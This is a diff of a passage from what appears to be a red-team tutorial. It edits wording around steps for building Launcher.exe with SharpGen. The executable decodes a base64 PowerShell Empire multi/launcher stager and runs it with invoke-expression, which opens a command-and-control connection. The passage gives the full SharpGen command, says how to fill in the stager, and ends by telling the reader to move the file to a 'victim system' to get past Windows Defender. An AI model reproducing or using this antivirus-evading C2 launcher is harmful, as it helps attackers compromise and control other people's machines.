 You will now find the executable to run on your victim system in the Output folder.
-The “-d net40” option in the command above targets .Net 4.0, you can change this to “-d net35” to target .Net 3.5 if this is what your victim system is running.
+The “-d net40” option in the command above targets .Net 4.0.
+Then you can change this to “-d net35” to target .Net 3.5 if this is what your victim system is running.

-To reach our final goal we are going to build an executable to run our PowerShell one-liner for establishing a C2 connection with Empire.
+Our initial goal can be accomplished by building an executable that will run a PowerShell one-liner to establish a C2 connection with Empire.
 We generate the one-liner using the multi/launcher stager in PowerShell Empire (some hints on how to do that here).
-All we need is the base64 string to copy and paste into this command.
+All we need is the resulting base64 string to copy and paste into the following command.

 dotnet bin/Release/netcoreapp2.1/SharpGen.dll -f Launcher.exe -d net40 "Console.WriteLine(Shell.PowerShellExecute(\"$c = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('<BASE64_LAUNCHER>')); invoke-expression -command $c\"));"

 Replace <BASE64_LAUNCHER> with the base64 string output produced by Empire’s multi/launcher (the stuff after “powershell -noP -sta -w 1 -enc”, including any equals signs at the end).

 You will find Launcher.exe in the Output directory.
 Move this to your victim system and voila!
 You have gotten past Windows Defender.